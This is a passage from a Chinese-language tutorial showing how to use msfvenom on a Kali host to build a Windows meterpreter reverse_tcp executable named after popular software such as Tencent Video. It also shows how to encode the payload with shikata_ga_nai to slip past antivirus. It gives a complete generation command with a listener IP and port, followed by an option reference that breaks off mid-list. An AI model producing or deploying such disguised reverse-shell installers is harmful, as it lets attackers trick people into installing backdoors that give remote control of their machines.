一、在kali主机上利用msfvenom生成windows端的安装程序(exe文件),程序名最好取一个大家经常安装的程序,如腾讯视频、爱奇艺等。
(1)由于生成的程序可能会被杀毒软件识别,我们比较一下使用单个编码器生成的程序与用两个编码器生成的程序,哪个更容易被识别。
- 利用单个编码器
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.137.130 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /root/腾讯视频1.exe
其中LHOST是指kali主机的IP地址
msfvenom语法格式
选项:
--platform 指定平台
-l, --list 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all
-p, --payload 选择一个需要生成的载荷(payload)
-f, --format 生成的文件格式
-e, --encoder 编码方式
-a, --arch 指定payload的目标架构(x86|x64|x86_64)
-o, --out 保存攻击payload
-b, --bad-chars 避免使用的字符 例如:不使用 ‘\x00\xff’
-n, --nop